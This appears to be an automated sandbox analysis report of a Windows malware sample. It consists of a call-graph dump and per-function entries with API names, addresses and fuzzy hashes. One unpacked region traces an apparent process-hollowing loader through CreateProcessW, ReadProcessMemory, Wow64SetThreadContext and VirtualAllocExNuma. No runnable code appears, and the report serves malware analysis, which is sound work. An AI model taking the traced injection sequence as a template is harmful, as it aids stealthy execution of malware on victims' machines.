17967->17968 18126 409c60 17968->18126 17971 404570 18179 40e6f5 17971->18179 17976 404ba0 14 API calls 17977 40459d 17976->17977 17978 404ba0 14 API calls 17977->17978 17979 4045a8 17978->17979 17980 404ba0 14 API calls 17979->17980 17981 4045b3 17980->17981 17982 404ba0 14 API calls 17981->17982 17983 4045be 17982->17983 17984 404ba0 14 API calls 17983->17984 17985 4045c9 17984->17985 17986 40e473 std::_Lockit::~_Lockit 2 API calls 17985->17986 17987 4045d1 17986->17987 17987->17867 18004 415de7 17988->18004 17992 40e6ce 17993 40e6de 17992->17993 17994 415de7 
std::_Locinfo::_Locinfo_dtor 73 API calls 17992->17994 17995 40e70f _Yarn 15 API calls 17993->17995 17994->17993 17996 404501 17995->17996 17996->17967 18123 40eb2b 17997->18123 18000 410337 CallUnexpected RaiseException 18001 40ea5d 18000->18001 18002 401a30 std::bad_exception::bad_exception 28 API calls 18001->18002 18003 404519 18002->18003 18005 41b9b7 std::_Locinfo::_Locinfo_dtor 5 API calls 18004->18005 18006 415df4 18005->18006 18015 416019 18006->18015 18009 40e70f 18010 40e71d 18009->18010 18014 40e748 _Yarn 18009->18014 18011 40e729 18010->18011 18012 415be6 ___std_exception_destroy 14 API calls 18010->18012 18013 415ddc ___std_exception_copy 15 API calls 18011->18013 18011->18014 18012->18011 18013->18014 18014->17992 18016 416025 ___scrt_is_nonwritable_in_current_image 18015->18016 18023 415904 EnterCriticalSection 18016->18023 18018 416033 18024 415eba 18018->18024 18020 416040 18052 416068 18020->18052 18023->18018 18055 415e1f 18024->18055 18026 415ed5 18027 415f20 18026->18027 18028 41ae68 __Getctype 48 API calls 18026->18028 18027->18020 18029 415ee2 18028->18029 18102 421b56 18029->18102 18032 415f0e 18032->18027 18034 4156b2 __Getctype 11 API calls 18032->18034 18033 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 18035 415f33 18033->18035 18038 416018 ___scrt_is_nonwritable_in_current_image 18034->18038 18035->18027 18036 421b56 std::_Locinfo::_Locinfo_dtor 50 API calls 18035->18036 18037 415f4f 18036->18037 18039 415f71 18037->18039 18040 415f56 18037->18040 18121 415904 EnterCriticalSection 18038->18121 18046 41ac67 _free 14 API calls 18039->18046 18048 415f9c 18039->18048 18040->18032 18043 415f68 18040->18043 18042 416033 18044 415eba std::_Locinfo::_Locinfo_dtor 73 API calls 18042->18044 18045 41ac67 _free 14 API calls 18043->18045 18047 416040 18044->18047 18045->18027 18046->18048 18049 416068 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 18047->18049 18048->18027 18050 41ac67 _free 14 API calls 18048->18050 18051 416051 18049->18051 
18050->18027 18051->18020 18122 41591b LeaveCriticalSection 18052->18122 18054 40e6b6 18054->18009 18056 415e39 18055->18056 18057 415e2b 18055->18057 18059 4218b3 __cftoe 50 API calls 18056->18059 18058 4135e8 std::_Locinfo::_Locinfo_dtor 69 API calls 18057->18058 18060 415e35 18058->18060 18061 415e50 18059->18061 18060->18026 18062 415eaf 18061->18062 18063 41bd43 __Getctype 14 API calls 18061->18063 18064 4156b2 __Getctype 11 API calls 18062->18064 18065 415e6b 18063->18065 18066 415eb9 18064->18066 18068 4218b3 __cftoe 50 API calls 18065->18068 18076 415e93 18065->18076 18070 415e1f std::_Locinfo::_Locinfo_dtor 73 API calls 18066->18070 18067 41ac67 _free 14 API calls 18069 415ea8 18067->18069 18071 415e82 18068->18071 18069->18026 18072 415ed5 18070->18072 18073 415e95 18071->18073 18074 415e89 18071->18074 18077 41ae68 __Getctype 48 API calls 18072->18077 18101 415f20 18072->18101 18075 4135e8 std::_Locinfo::_Locinfo_dtor 69 API calls 18073->18075 18074->18062 18074->18076 18075->18076 18076->18067 18078 415ee2 18077->18078 18079 421b56 std::_Locinfo::_Locinfo_dtor 50 API calls 18078->18079 18080 415f07 18079->18080 18081 415f0e 18080->18081 18082 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 18080->18082 18083 4156b2 __Getctype 11 API calls 18081->18083 18081->18101 18084 415f33 18082->18084 18087 416018 ___scrt_is_nonwritable_in_current_image 18083->18087 18085 421b56 std::_Locinfo::_Locinfo_dtor 50 API calls 18084->18085 18084->18101 18086 415f4f 18085->18086 18088 415f71 18086->18088 18089 415f56 18086->18089 18090 415904 std::_Lockit::_Lockit EnterCriticalSection 18087->18090 18095 41ac67 _free 14 API calls 18088->18095 18097 415f9c 18088->18097 18089->18081 18092 415f68 18089->18092 18091 416033 18090->18091 18093 415eba std::_Locinfo::_Locinfo_dtor 73 API calls 18091->18093 18094 41ac67 _free 14 API calls 18092->18094 18096 416040 18093->18096 18094->18101 18095->18097 18098 416068 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 18096->18098 
18099 41ac67 _free 14 API calls 18097->18099 18097->18101 18100 416051 18098->18100 18099->18101 18100->18026 18101->18026 18103 421b6d 18102->18103 18104 421b9f 18103->18104 18108 421b71 18103->18108 18105 415317 __dosmaperr 14 API calls 18104->18105 18106 421ba4 18105->18106 18107 415685 ___std_exception_copy 27 API calls 18106->18107 18117 415f07 18107->18117 18109 421bb2 18108->18109 18110 421b92 18108->18110 18112 421c1d std::_Locinfo::_Locinfo_dtor 50 API calls 18109->18112 18111 415317 __dosmaperr 14 API calls 18110->18111 18113 421b97 18111->18113 18114 421bbf 18112->18114 18116 415685 ___std_exception_copy 27 API calls 18113->18116 18115 421bc7 18114->18115 18119 421bd7 18114->18119 18118 415317 __dosmaperr 14 API calls 18115->18118 18116->18117 18117->18032 18117->18033 18118->18117 18119->18117 18120 415317 __dosmaperr 14 API calls 18119->18120 18120->18113 18121->18042 18122->18054 18124 403fa0 std::invalid_argument::invalid_argument 28 API calls 18123->18124 18125 40ea4f 18124->18125 18125->18000 18141 409f70 18126->18141 18131 409f90 48 API calls 18132 409cc8 18131->18132 18147 409fc0 18132->18147 18134 409d11 18135 409fc0 RaiseException 18134->18135 18136 409d3f 18135->18136 18137 409fc0 RaiseException 18136->18137 18138 409d6d _Yarn 18137->18138 18151 40a130 18138->18151 18155 415db4 18141->18155 18144 409f90 18160 40ecc6 18144->18160 18148 409fdb __Getctype _strlen 18147->18148 18149 40a006 18148->18149 18175 40e9e1 18148->18175 18149->18134 18152 409bd7 18151->18152 18153 40a148 18151->18153 18152->17971 18154 40a160 14 API calls 18153->18154 18154->18152 18156 41ae68 __Getctype 48 API calls 18155->18156 18157 415dbf 18156->18157 18158 41b3b2 __Getctype 48 API calls 18157->18158 18159 409c88 18158->18159 18159->18144 18161 40ecd9 std::bad_exception::bad_exception 18160->18161 18162 412f37 __Getctype 48 API calls 18161->18162 18163 40ece1 18162->18163 18170 412a8d 18163->18170 18166 412f10 __Getctype 48 API calls 18167 40ecf0 18166->18167 18168 
4130be __Getctype 48 API calls 18167->18168 18169 409c99 18167->18169 18168->18169 18169->18131 18171 41ae68 __Getctype 48 API calls 18170->18171 18172 412a98 18171->18172 18173 41b3b2 __Getctype 48 API calls 18172->18173 18174 40ece8 18173->18174 18174->18166 18176 40e9ef Concurrency::cancel_current_task 18175->18176 18177 410337 CallUnexpected RaiseException 18176->18177 18178 40e9fd 18177->18178 18180 40e701 18179->18180 18181 404587 18179->18181 18182 415de7 std::_Locinfo::_Locinfo_dtor 73 API calls 18180->18182 18183 404ba0 18181->18183 18182->18181 18186 404bc0 18183->18186 18187 404592 18186->18187 18188 404bd8 18186->18188 18187->17976 18189 415be6 ___std_exception_destroy 14 API calls 18188->18189 18189->18187 18190->17885 18191->17888 18193 404098 18192->18193 18194 4042e6 18192->18194 18193->17839 18193->17840 18194->18193 18195 40e0c8 std::_Facet_Register 16 API calls 18194->18195 18196 4042fe 18195->18196 18197 404480 76 API calls 18196->18197 18198 404314 18197->18198 18202 404520 18198->18202 18201 404570 74 API calls 18201->18193 18203 404540 18202->18203 18206 4046a0 18203->18206 18209 404ac0 18206->18209 18212 40ec5b 18209->18212 18213 412f37 __Getctype 48 API calls 18212->18213 18214 40ec64 __Getctype 18213->18214 18215 40ec9c 18214->18215 18216 40ec7e 18214->18216 18218 4130be __Getctype 48 API calls 18215->18218 18217 4130be __Getctype 48 API calls 18216->18217 18219 40ec85 18217->18219 18218->18219 18220 412f10 __Getctype 48 API calls 18219->18220 18221 40ecad 18220->18221 18222 40432f 18221->18222 18224 415b29 18221->18224 18222->18201 18225 415b71 18224->18225 18226 415b36 18224->18226 18225->18222 18227 415ddc ___std_exception_copy 15 API calls 18226->18227 18228 415b59 18227->18228 18228->18225 18233 41b40c 18228->18233 18231 4156b2 __Getctype 11 API calls 18232 415b87 18231->18232 18234 41b419 18233->18234 18235 41b427 18233->18235 18234->18235 18240 41b440 18234->18240 18236 415317 __dosmaperr 14 API calls 18235->18236 18237 41b431 
18236->18237 18238 415685 ___std_exception_copy 27 API calls 18237->18238 18239 415b6a 18238->18239 18239->18225 18239->18231 18240->18239 18241 415317 __dosmaperr 14 API calls 18240->18241 18241->18237 18243 40a303 18242->18243 18244 403040 29 API calls 18243->18244 18245 40a315 18243->18245 18244->18245 18246 403100 29 API calls 18245->18246 18247 40a34e 18245->18247 18246->18247 18247->17845 18249 40740e 18248->18249 18250 403040 29 API calls 18249->18250 18251 40741f 18249->18251 18250->18251 18252 403100 29 API calls 18251->18252 18254 407461 18252->18254 18253 40752d 18253->17847 18254->18253 18256 403c00 18254->18256 18257 403c30 27 API calls 18256->18257 18258 403c24 18257->18258 18258->18253 18261 40df9a 18259->18261 18260 40dfaa 18260->17852 18261->18260 18262 403c00 27 API calls 18261->18262 18262->18260 18264 415d61 18263->18264 18269 415d47 18263->18269 18265 41ae68 __Getctype 48 API calls 18264->18265 18266 415d66 18265->18266 18267 41b3b2 __Getctype 48 API calls 18266->18267 18268 415d76 18267->18268 18268->18269 18270 42177f 51 API calls 18268->18270 18269->17810 18271 415da3 18270->18271 18271->17810 18273 4196fe 18272->18273 18275 419708 18272->18275 18276 419720 18273->18276 18275->17812 18277 419737 18276->18277 18285 41974c 18276->18285 18278 4129fa __fassign 48 API calls 18277->18278 18279 419743 18278->18279 18280 419798 18279->18280 18279->18285 18286 421f7f 18279->18286 18282 415317 __dosmaperr 14 API calls 18280->18282 18283 41979e 18280->18283 18282->18283 18284 41c132 52 API calls 18283->18284 18284->18285 18285->18275 18287 4129fa __fassign 48 API calls 18286->18287 18288 421f92 __fassign 18287->18288 18288->18280 18344 41b074 18345 41b08f 18344->18345 18346 41b07f 18344->18346 18350 41b179 18346->18350 18349 41ac67 _free 14 API calls 18349->18345 18351 41b194 18350->18351 18352 41b18e 18350->18352 18354 41ac67 _free 14 API calls 18351->18354 18353 41ac67 _free 14 API calls 18352->18353 18353->18351 18355 41b1a0 18354->18355 18356 
41ac67 _free 14 API calls 18355->18356 18357 41b1ab 18356->18357 18358 41ac67 _free 14 API calls 18357->18358 18359 41b1b6 18358->18359 18360 41ac67 _free 14 API calls 18359->18360 18361 41b1c1 18360->18361 18362 41ac67 _free 14 API calls 18361->18362 18363 41b1cc 18362->18363 18364 41ac67 _free 14 API calls 18363->18364 18365 41b1d7 18364->18365 18366 41ac67 _free 14 API calls 18365->18366 18367 41b1e2 18366->18367 18368 41ac67 _free 14 API calls 18367->18368 18369 41b1ed 18368->18369 18370 41ac67 _free 14 API calls 18369->18370 18371 41b1fb 18370->18371 18376 41b2f2 18371->18376 18377 41b2fe ___scrt_is_nonwritable_in_current_image 18376->18377 18392 415904 EnterCriticalSection 18377->18392 18380 41b308 18382 41ac67 _free 14 API calls 18380->18382 18383 41b332 18380->18383 18382->18383 18393 41b351 18383->18393 18384 41b35d 18385 41b369 ___scrt_is_nonwritable_in_current_image 18384->18385 18397 415904 EnterCriticalSection 18385->18397 18387 41b373 18388 41b095 __Getctype 14 API calls 18387->18388 18389 41b386 18388->18389 18398 41b3a6 18389->18398 18392->18380 18396 41591b LeaveCriticalSection 18393->18396 18395 41b221 18395->18384 18396->18395 18397->18387 18401 41591b LeaveCriticalSection 18398->18401 18400 41b087 18400->18349 18401->18400 18412 40e078 18417 40e492 18412->18417 18418 40e4a2 18417->18418 18419 40e082 18417->18419 18418->18419 18424 40f8c8 InitializeCriticalSectionEx 18418->18424 18421 40e1f1 18419->18421 18425 40e206 18421->18425 18424->18418 18426 40e215 18425->18426 18427 40e21c 18425->18427 18431 415048 18426->18431 18434 414fe8 18427->18434 18430 40e08c 18432 414fe8 30 API calls 18431->18432 18433 41505a 18432->18433 18433->18430 18437 415261 18434->18437 18438 41526d ___scrt_is_nonwritable_in_current_image 18437->18438 18445 415904 EnterCriticalSection 18438->18445 18440 41527b 18446 41505e 18440->18446 18442 415288 18456 4152b0 18442->18456 18445->18440 18447 41507a 18446->18447 18449 4150f1 std::_Locinfo::_Locinfo_dtor 18446->18449 18448 
4150d1 18447->18448 18447->18449 18459 420a90 18447->18459 18448->18449 18450 420a90 30 API calls 18448->18450 18449->18442 18452 4150e7 18450->18452 18454 41ac67 _free 14 API calls 18452->18454 18453 4150c7 18455 41ac67 _free 14 API calls 18453->18455 18454->18449 18455->18448 18487 41591b LeaveCriticalSection 18456->18487 18458 415019 18458->18430 18460 420ab8 18459->18460 18461 420a9d 18459->18461 18463 420ac7 18460->18463 18468 423d30 18460->18468 18461->18460 18462 420aa9 18461->18462 18464 415317 __dosmaperr 14 API calls 18462->18464 18475 42184a 18463->18475 18467 420aae std::bad_exception::bad_exception 18464->18467 18467->18453 18469 423d50 HeapSize 18468->18469 18470 423d3b 18468->18470 18469->18463 18471 415317 __dosmaperr 14 API calls 18470->18471 18472 423d40 18471->18472 18473 415685 ___std_exception_copy 27 API calls 18472->18473 18474 423d4b 18473->18474 18474->18463 18476 421862 18475->18476 18477 421857 18475->18477 18479 42186a 18476->18479 18485 421873 __Getctype 18476->18485 18478 41aca1 std::_Locinfo::_Locinfo_dtor 15 API calls 18477->18478 18484 42185f 18478->18484 18482 41ac67 _free 14 API calls 18479->18482 18480 421878 18483 415317 __dosmaperr 14 API calls 18480->18483 18481 42189d HeapReAlloc 18481->18484 18481->18485 18482->18484 18483->18484 18484->18467 18485->18480 18485->18481 18486 413483 std::_Facet_Register 2 API calls 18485->18486 18486->18485 18487->18458 18654 41d417 18655 41d094 ___scrt_uninitialize_crt 77 API calls 18654->18655 18656 41d41f 18655->18656 18664 423103 18656->18664 18658 41d424 18674 4231ae 18658->18674 18661 41d44e 18662 41ac67 _free 14 API calls 18661->18662 18663 41d459 18662->18663 18665 42310f ___scrt_is_nonwritable_in_current_image 18664->18665 18678 415904 EnterCriticalSection 18665->18678 18667 423186 18692 4231a5 18667->18692 18669 42315a DeleteCriticalSection 18672 41ac67 _free 14 API calls 18669->18672 18673 42311a 18672->18673 18673->18667 18673->18669 18679 4241a5 18673->18679 18675 4231c5 
18674->18675 18676 41d433 DeleteCriticalSection 18674->18676 18675->18676 18677 41ac67 _free 14 API calls 18675->18677 18676->18658 18676->18661 18677->18676 18678->18673 18680 4241b1 ___scrt_is_nonwritable_in_current_image 18679->18680 18681 4241d0 18680->18681 18682 4241bb 18680->18682 18691 4241cb 18681->18691 18695 41d327 EnterCriticalSection 18681->18695 18683 415317 __dosmaperr 14 API calls 18682->18683 18685 4241c0 18683->18685 18687 415685 ___std_exception_copy 27 API calls 18685->18687 18686 4241ed 18696 424229 18686->18696 18687->18691 18689 4241f8 18712 42421f 18689->18712 18691->18673 18776 41591b LeaveCriticalSection 18692->18776 18694 423192 18694->18658 18695->18686 18697 424236 18696->18697 18698 42424b 18696->18698 18699 415317 __dosmaperr 14 API calls 18697->18699 18700 41d0e5 ___scrt_uninitialize_crt 73 API calls 18698->18700 18704 424246 18698->18704 18701 42423b 18699->18701 18702 424260 18700->18702 18703 415685 ___std_exception_copy 27 API calls 18701->18703 18705 4231ae 14 API calls 18702->18705 18703->18704 18704->18689 18706 424268 18705->18706 18707 41dbf8 ___scrt_uninitialize_crt 27 API calls 18706->18707 18708 42426e 18707->18708 18715 4247c1 18708->18715 18711 41ac67 _free 14 API calls 18711->18704 18775 41d33b LeaveCriticalSection 18712->18775 18714 424227 18714->18691 18716 4247d2 18715->18716 18717 4247e7 18715->18717 18719 41532a __dosmaperr 14 API calls 18716->18719 18718 424830 18717->18718 18722 42480e 18717->18722 18720 41532a __dosmaperr 14 API calls 18718->18720 18721 4247d7 18719->18721 18723 424835 18720->18723 18724 415317 __dosmaperr 14 API calls 18721->18724 18730 4248ea 18722->18730 18726 415317 __dosmaperr 14 API calls 18723->18726 18728 424274 18724->18728 18727 42483d 18726->18727 18729 415685 ___std_exception_copy 27 API calls 18727->18729 18728->18704 18728->18711 18729->18728 18731 4248f6 ___scrt_is_nonwritable_in_current_image 18730->18731 18741 420dcd EnterCriticalSection 18731->18741 18733 424904 18734 424936 
18733->18734 18735 42492b 18733->18735 18737 415317 __dosmaperr 14 API calls 18734->18737 18742 42484e 18735->18742 18738 424931 18737->18738 18757 42496a 18738->18757 18741->18733 18743 420b84 ___scrt_uninitialize_crt 27 API calls 18742->18743 18746 42485e 18743->18746 18744 424864 18760 420bee 18744->18760 18746->18744 18747 424896 18746->18747 18750 420b84 ___scrt_uninitialize_crt 27 API calls 18746->18750 18747->18744 18748 420b84 ___scrt_uninitialize_crt 27 API calls 18747->18748 18751 4248a2 CloseHandle 18748->18751 18753 42488d 18750->18753 18751->18744 18755 4248ae GetLastError 18751->18755 18752 4248de 18752->18738 18754 420b84 ___scrt_uninitialize_crt 27 API calls 18753->18754 18754->18747 18755->18744 18774 420df0 LeaveCriticalSection 18757->18774 18759 424953 18759->18728 18761 420c64 18760->18761 18762 420bfd 18760->18762 18763 415317 __dosmaperr 14 API calls 18761->18763 18762->18761 18767 420c27 18762->18767 18764 420c69 18763->18764 18765 41532a __dosmaperr 14 API calls 18764->18765 18766 420c54 18765->18766 18766->18752 18769 41533d 18766->18769 18767->18766 18768 420c4e SetStdHandle 18767->18768 18768->18766 18770 41532a __dosmaperr 14 API calls 18769->18770 18771 415348 __dosmaperr 18770->18771 18772 415317 __dosmaperr 14 API calls 18771->18772 18773 41535b 18772->18773 18773->18752 18774->18759 18775->18714 18776->18694 17366 41ae22 17374 41b6a2 17366->17374 17368 41ae36 17370 41afbf __dosmaperr 14 API calls 17371 41ae3e 17370->17371 17372 41ae4b 17371->17372 17379 41ae4e 17371->17379 17375 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17374->17375 17376 41b6be 17375->17376 17377 41b6d6 TlsAlloc 17376->17377 17378 41ae2c 17376->17378 17377->17378 17378->17368 17378->17370 17380 41ae58 17379->17380 17382 41ae5e 17379->17382 17383 41b6e1 17380->17383 17382->17368 17384 41bab5 std::_Locinfo::_Locinfo_dtor 5 API calls 17383->17384 17385 41b6fd 17384->17385 17386 41b706 17385->17386 17387 41b718 TlsFree 17385->17387 17386->17382 17539 41003e 17544 
40f6fd SetUnhandledExceptionFilter 17539->17544 17541 410043 17545 415afa 17541->17545 17543 41004e 17544->17541 17546 415b20 17545->17546 17547 415b06 17545->17547 17546->17543 17547->17546 17548 415317 __dosmaperr 14 API calls 17547->17548 17549 415b10 17548->17549 17550 415685 ___std_exception_copy 27 API calls 17549->17550 17551 415b1b 17550->17551 17551->17543 17516 40f8c7 InitializeCriticalSectionEx 17517 40e0c8 17520 40e0cd 17517->17520 17519 40e0e7 17520->17519 17521 413483 std::_Facet_Register 2 API calls 17520->17521 17522 40e0e9 17520->17522 17529 415ddc 17520->17529 17521->17520 17523 40f479 std::_Facet_Register 17522->17523 17525 40e0f3 Concurrency::cancel_current_task 17522->17525 17524 410337 CallUnexpected RaiseException 17523->17524 17526 40f495 17524->17526 17536 410337 17525->17536 17528 40e9fd 17535 41aca1 __Getctype 17529->17535 17530 41acdf 17531 415317 __dosmaperr 14 API calls 17530->17531 17533 41acdd 17531->17533 17532 41acca RtlAllocateHeap 17532->17533 17532->17535 17533->17520 17534 413483 std::_Facet_Register 2 API calls 17534->17535 17535->17530 17535->17532 17535->17534 17537 41037e RaiseException 17536->17537 17538 410351 17536->17538 17537->17528 17538->17537 17388 2308b7 17400 23005f GetPEB 17388->17400 17390 230919 17401 230838 17390->17401 17392 230921 17393 2309b4 17392->17393 17394 2309d0 CreateFileW 17392->17394 17394->17393 17395 2309fa VirtualAlloc ReadFile 17394->17395 17395->17393 17398 230a27 17395->17398 17396 230a40 17398->17396 17399 230d92 ExitProcess 17398->17399 17414 23020a 17398->17414 17400->17390 17428 23005f GetPEB 17401->17428 17403 23084c 17429 23005f GetPEB 17403->17429 17405 23085f 17430 23005f GetPEB 17405->17430 17407 230872 17431 2307da 17407->17431 17409 230880 17410 23089c VirtualAllocExNuma 17409->17410 17411 2308a9 17410->17411 17436 23073a 17411->17436 17443 23005f GetPEB 17414->17443 17416 2303b3 17416->17398 17417 2303c1 CreateProcessW 17419 2303eb 17417->17419 17427 230218 17417->17427 17418 
230410 ReadProcessMemory 17418->17419 17418->17427 17419->17416 17471 23114c 17419->17471 17422 23114c 11 API calls 17422->17427 17423 2312fb 11 API calls 17423->17427 17425 230675 Wow64SetThreadContext 17425->17419 17425->17427 17427->17416 17427->17417 17427->17418 17427->17419 17427->17422 17427->17423 17427->17425 17444 2311e1 17427->17444 17453 230f9a 17427->17453 17462 23109b 17427->17462 17428->17403 17429->17405 17430->17407 17441 23005f GetPEB 17431->17441 17433 2307ea 17434 2307f0 GetSystemInfo 17433->17434 17435 23081b 17434->17435 17435->17409 17442 23005f GetPEB 17436->17442 17438 230746 17439 230766 VirtualAlloc 17438->17439 17440 230783 17439->17440 17440->17392 17441->17433 17442->17438 17443->17427 17445 2311fc 17444->17445 17480 23013e GetPEB 17445->17480 17447 23121d 17448 2312d5 17447->17448 17449 231225 17447->17449 17497 231627 17448->17497 17482 230d9b 17449->17482 17452 2312bc 17452->17427 17454 230fb5 17453->17454 17455 23013e GetPEB 17454->17455 17456 230fd6 17455->17456 17457 231068 17456->17457 17458 230fde 17456->17458 17507 23164b 17457->17507 17459 230d9b 10 API calls 17458->17459 17461 23104f 17459->17461 17461->17427 17463 2310b6 17462->17463 17464 23013e GetPEB 17463->17464 17465 2310d7 17464->17465 17466 231121 17465->17466 17467 2310db 17465->17467 17510 23165d 17466->17510 17468 230d9b 10 API calls 17467->17468 17470 231116 17468->17470 17470->17427 17472 23115f 17471->17472 17473 23013e GetPEB 17472->17473 17474 231180 17473->17474 17475 231184 17474->17475 17476 2311ca 17474->17476 17477 230d9b 10 API calls 17475->17477 17513 231615 17476->17513 17479 2311bf 17477->17479 17479->17416 17481 230160 17480->17481 17481->17447 17500 23005f GetPEB 17482->17500 17484 230de4 17501 230109 GetPEB 17484->17501 17487 230e71 17488 230e82 VirtualAlloc 17487->17488 17493 230f46 17487->17493 17489 230e98 ReadFile 17488->17489 17488->17493 17490 230ead VirtualAlloc 17489->17490 17489->17493 17490->17493 17494 230ece 17490->17494 17491 230f84 
VirtualFree 17492 230f8f 17491->17492 17492->17452 17493->17491 17493->17492 17494->17493 17495 230f35 CloseHandle 17494->17495 17496 230f39 VirtualFree 17494->17496 17495->17496 17496->17493 17498 230d9b 10 API calls 17497->17498 17499 231631 17498->17499 17499->17452 17500->17484 17503 23011c 17501->17503 17504 230131 CreateFileW 17503->17504 17505 23017b GetPEB 17503->17505 17504->17487 17504->17493 17506 23019f 17505->17506 17506->17503 17508 230d9b 10 API calls 17507->17508 17509 231655 17508->17509 17509->17461 17511 230d9b 10 API calls 17510->17511 17512 231667 17511->17512 17512->17470 17514 230d9b 10 API calls 17513->17514 17515 23161f 17514->17515 17515->17479 20602 42258e 20605 41c5a2 20602->20605 20606 41c5dd 20605->20606 20607 41c5ab 20605->20607 20608 41c5ce 20607->20608 20609 41af25 48 API calls 20607->20609 20610 41c953 58 API calls 20608->20610 20609->20608 20610->20606 17015 40e492 17016 40e4a2 17015->17016 17017 40e4ba 17015->17017 17016->17017 17019 40f8c8 InitializeCriticalSectionEx 17016->17019 17019->17016 17020 41c5a3 17025 41af25 17020->17025 17024 41c5dd 17026 41af30 17025->17026 17027 41af36 17025->17027 17028 41b720 __Getctype 6 API calls 17026->17028 17029 41b75f __Getctype 6 API calls 17027->17029 17031 41af3c 17027->17031 17028->17027 17030 41af50 17029->17030 17030->17031 17033 41bd43 __Getctype 14 API calls 17030->17033 17032 415b88 CallUnexpected 48 API calls 17031->17032 17038 41afb5 17031->17038 17034 41afbe 17032->17034 17035 41af60 17033->17035 17036 41af68 17035->17036 17037 41af7d 17035->17037 17040 41b75f __Getctype 6 API calls 17036->17040 17039 41b75f __Getctype 6 API calls 17037->17039 17050 41c953 17038->17050 17041 41af89 17039->17041 17047 41af74 17040->17047 17042 41af8d 17041->17042 17043 41af9c 17041->17043 17045 41b75f __Getctype 6 API calls 17042->17045 17046 41b0e0 __Getctype 14 API calls 17043->17046 17044 41ac67 _free 14 API calls 17044->17031 17045->17047 17048 41afa7 17046->17048 17047->17044 17049 41ac67 
                                          Call-graph edge list (tail of a graph spanning many functions of the PE image at 00400000): C runtime locale and code-page initialization, reaching GetACP and GetOEMCP through 0041C7DD, RtlAllocateHeap through 0041ACA1, IsValidCodePage and GetCPInfo through 0041C5EA, MultiByteToWideChar through 0041ACEF, WideCharToMultiByte through 0041AD6B, LCMapStringW through 0041B89F, GetStringTypeW inside 0041C02F, and EnterCriticalSection/LeaveCriticalSection around 0041CCA8. None of these are attacker-controlled API use; they are the statically linked CRT.

                                          Control-flow Graph
                                          • Function 002308B7 (memory region 00230000, not PE-backed): CreateFileW, then VirtualAlloc and ReadFile, then the routine at 0023020A, then ExitProcess; every failed check falls through to the exit block at 00230D97.
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocNumaVirtual
                                          • String ID:
                                          • API String ID: 4233825816-0
                                          • Opcode ID: 55b22853a2993f0f21eb55e3da2865d1a426949fd4ee5c463d8c609a0ba9bc2d
                                          • Instruction ID: f187909bbc79679f48694e0bea92c0baf5220c3965621e78375268fd15ab93a8
                                          • Opcode Fuzzy Hash: 55b22853a2993f0f21eb55e3da2865d1a426949fd4ee5c463d8c609a0ba9bc2d
                                          • Instruction Fuzzy Hash: 51027460C5D2D9ADDF02CBE984557FDBFB09F2A201F1841C6E4E0B6283D13A935ADB25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Function 00401000 (PE image at 00400000): calls 004011D0 and 0040E12E, then 00401200, a loop over 00401094-004010F6, then VirtualAlloc and a call to 00412320 before the exit path through 00401440.
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: @$tvxyldblemyhw
                                          • API String ID: 4275171209-460681131
                                          • Opcode ID: 3e177a7d2e86f58c96a6a4f8a45f5d4baddb77432dfb2f077bb93cd8b45913c4
                                          • Instruction ID: 7aaee2c2e6d78501d51bf851492d869c5d4d5b2f8c63b9516c1bd50cccf5b8dc
                                          • Opcode Fuzzy Hash: 3e177a7d2e86f58c96a6a4f8a45f5d4baddb77432dfb2f077bb93cd8b45913c4
                                          • Instruction Fuzzy Hash: 184118B0904249DFCB04DFA8D5947DEBBF0BF08304F10856EE485A7391D7799A44CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemInfo.KERNELBASE(?), ref: 002307F7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoSystem
                                          • String ID:
                                          • API String ID: 31276548-0
                                          • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                          • Instruction ID: af7d0608da51ce6d4509d552f66ad5cd5b73064335690ee9c4de80ea450483bd
                                          • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                          • Instruction Fuzzy Hash: 60F037B1D3410CABDB4CEAB898A56BE77ACDB08310F104569E616E2541D534895146B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0040F702
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
